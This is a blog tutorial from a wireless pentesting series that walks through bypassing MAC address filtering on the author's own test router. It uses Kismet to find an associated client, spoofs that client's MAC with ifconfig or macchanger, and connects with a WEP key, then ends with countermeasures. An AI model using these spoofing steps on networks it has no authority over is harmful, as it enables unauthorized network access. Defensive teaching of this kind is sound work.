Monday, February 3, 2014

Wireless Pentesting on the Cheap (Kali + TL-WN722N) - MAC Filtering

By Tony Lee

Introduction

In our previous articles we used TP-Link’s TL-WN722N and a Kali Virtual Machine (VM) to perform wireless discovery and attack against a Wired Equivalent Privacy (WEP) network, WPA (Pre-Shared Key) PSK network, and a network hiding its SSID to showcase the abilities of this inexpensive and flexible setup.
In this article we will continue to test our setup by attacking a home router that is implementing MAC address filtering--walking you through the attack from start to finish.
Figure 1:  Our setup
Consult our previous article WEP for the following topics as they are omitted from this article due to similarity:
  • Equipment
    • Hardware
    • Software
  • Tips and tricks
    • Version of Workstation
    • Screen Resolution
    • Simple Text Editor
  • Connecting the USB Device

Outline

  • Preparation
  • Discovery
  • Attack
    • Explained
    • Find a Client
    • MAC spoof
      • ifconfig
      • macchanger
  • Connect
  • Countermeasures
  • Conclusion

Preparation

NetworkManager (included in the default Kali Linux) can cause problems when trying to complete simple tasks such as connecting to wireless networks.  To prevent any interference, we will disable it ahead of time.

root@kali:~# service network-manager stop
[ ok ] Stopping network connection manager: NetworkManager.


Discovery

In the previous article, we mentioned that the simplest way to ensure that the wireless card is working is to do some light discovery.  After all, the first step in a wireless engagement is to identify targets of interest.
Let’s check out the networks using the iwlist command as we can stay in “Managed” mode.

root@kali:~# iwlist wlan0 scanning | grep -A 30 30:46:9A:16:ED:CE
         Cell 16 - Address: 30:46:9A:16:ED:CE
                   Channel:6
                   Frequency:2.437 GHz (Channel 6)
                   Quality=63/70  Signal level=-47 dBm  
                   Encryption key:on
                   ESSID:"QX3A7"
                   Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                             9 Mb/s; 12 Mb/s; 18 Mb/s
                   Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
                   Mode:Master
--snip--

Attack

For this scenario, we have discovered an access point of arbitrary protection and we either know or have actively discovered the required information to connect to the access point.  However, even after entering the information correctly, we still cannot associate to the access point.


Figure 2:  No matter how many times we try to associate, the AP will not allow it
At this point we believe that the access point is performing MAC address filtering (aka whitelisting).  We will now look at how easy this is to set up and also examine ways that we can bypass this protection mechanism.

Explained

Access points can use MAC address filtering to prevent unknown hosts from connecting to the network.  Even our inexpensive Netgear router can utilize MAC address filtering--it is enabled through the Wireless Card Access List option as shown below:
Figure 3:  The screenshot above shows the checkbox to enable broadcasting the SSID.  Uncheck the box to hide it.
After clicking on the “Setup Access List” button, we are taken to another screen which allows us to turn the access control on and also add, edit, and delete devices contained within the access list.  In the screenshot below, we only have one client that is allowed to access this access point.
Figure 4:  Only one wireless card is authorized to connect to our test access point.
This may seem like a secure configuration, however the key weakness in MAC address filtering is that MAC addresses can be changed (spoofed) to any value an attacker wishes.  The administrator will know the list of approved clients, however the attacker will generally not know who is allowed to connect.  Since it is possible to discover clients that are already connected to access points, it is possible to select one of those in which to masquerade.  Thus, an attacker must first find an already associated client and then spoof their MAC address to connect to the access point.

Find a Client

This time we will use Kismet to find a wireless client.  We will need far less information than what we had in the previous article:
  • MAC address of a wireless client


root@kali:~# kismet -c wlan0



Figure 5:  Kismet allows us to easily find our wireless client to spoof

Examining the Kismet screenshot, we determined that the client MAC address that we want to spoof is:

24:77:03:8C:D3:44




MAC Spoof

There are a couple of ways in which we can change our MAC address in Linux:
  • ifconfig
  • macchanger

ifconfig

The ifconfig command can be used to change our MAC address using the syntax below:

Syntax:
ifconfig <INT> down
ifconfig <INT> hw ether <XX:XX:XX:XX:XX:XX>
ifconfig <INT> up

Attack:
ifconfig wlan0 down
ifconfig wlan0 hw ether 24:77:03:8C:D3:44
ifconfig wlan0 up



Figure 6:  Changing the wireless card’s MAC address using ifconfig

macchanger

Macchanger is rightfully described in the man pages as “a Linux utility for viewing/manipulating the MAC address for network interfaces”.  It is simplistic in usage by allowing a user to change their hardware address to a random value or one of their choosing.

Help:
root@kali:~# macchanger --help
GNU MAC Changer
Usage: macchanger [options] device

 -h,  --help                   Print this help
 -V,  --version                Print version and exit
 -s,  --show                   Print the MAC address and exit
 -e,  --ending                 Don't change the vendor bytes
 -a,  --another                Set random vendor MAC of the same kind
 -A                            Set random vendor MAC of any kind
 -p,  --permanent              Reset to original, permanent hardware MAC
 -r,  --random                 Set fully random MAC
 -l,  --list[=keyword]         Print known vendors
 -m,  --mac=XX:XX:XX:XX:XX:XX
      --mac XX:XX:XX:XX:XX:XX  Set the MAC XX:XX:XX:XX:XX:XX

Report bugs to alvaro@gnu.org

Syntax:
macchanger -m XX:XX:XX:XX:XX:XX wlan0

Attack:
macchanger -m 24:77:03:8C:D3:44 wlan0



Figure 7:  Changing the wireless card’s MAC address using macchanger

Connect

Since we are using our WEP setup from the previous article (same WEP key) and we have spoofed our whitelisted client, we can finally connect to the access point using the command line steps outlined below:

Check the status of the card:
root@kali:~#  iwconfig wlan0

Enter the network information:
root@kali:~# iwconfig wlan0 essid "QX3A7" key 55:70:9E:69:0D:A0:9B:E1:18:DB:3A:7E:D9

Bring the Interface up:
root@kali:~# ifconfig wlan0 up

Check the Association:
root@kali:~# iwconfig wlan0

Obtain an IP:
root@kali:~# dhclient wlan0
Reloading /etc/samba/smb.conf: smbd only.

Verify an IP is obtained:
root@kali:~# ifconfig wlan0




Figure 8:  Putting it all together:  Spoofing the MAC, connecting to the AP, pinging Google
One interesting thing to note is that our victim and attacker could not be associated at the same time.  The Netgear router may have some additional capabilities that detects a wireless client that is attempting to connect when there is already one connected with the same MAC address.  We also tried changing the IP address of the second wireless client, but no dice.  If this were a thin client setup, we would attempt to connect to a different AP.  Once the victim logged off, we were able to bypass MAC address filtering and access the Internet.  Access Points handle this differently, so your mileage may vary.

Countermeasures

Even though the intention of this article is not to warn about the dangers of relying on MAC address filtering as a sole means of security, we feel that doing so is worth noting.  MAC filtering as a sole defensive mechanism is security through obscurity, however when used as part of a layered defense, it can deter entry level hackers.  The problem with using this as part of a layered defense in a corporate environment is that it does not scale very well because it often requires manual configuration--thus we do not see it often.  However, when it is used, it is on a select few networks which have legacy clients (usually required for hand scanners or some other one-off devices).

For networks that cannot utilize WPA-Enterprise, in addition to MAC filtering, we recommend the following additional defensive measures:
  • Turn off the network if it is no longer needed
  • Air gap the wireless network from the corporate network
  • Use WPA-PSK with a REALLY long and complex password - change frequently if possible
  • Segment the wireless network from the wired network via Firewall and IPS

Conclusion

In this article, we proved the capabilities of an inexpensive wireless adapter and a flexible virtualized wireless attack image by uncovering defeating MAC address filtering.  For just $16 and no reboot required you can place a wireless adapter into monitor mode and start assessing wireless networks.  More testing needs to be done with this setup to determine other capabilities; however as of right now, it appears that it can provide quick, portable, flexible, and inexpensive wireless testing.  Feedback below is always appreciated.
If you try this with different cards and run into issues, check the following excellent resource:  http://docs.kali.org/troubleshooting/troubleshooting-wireless-driver-issues

Special Thanks

Dan Dumond

Rudolph Araujo

2 comments:

  1. Another fine post Tony! Keep up the great educational & entertaining work!

    ReplyDelete
    Replies
    1. Thanks again for the feedback. Always appreciated.

      Delete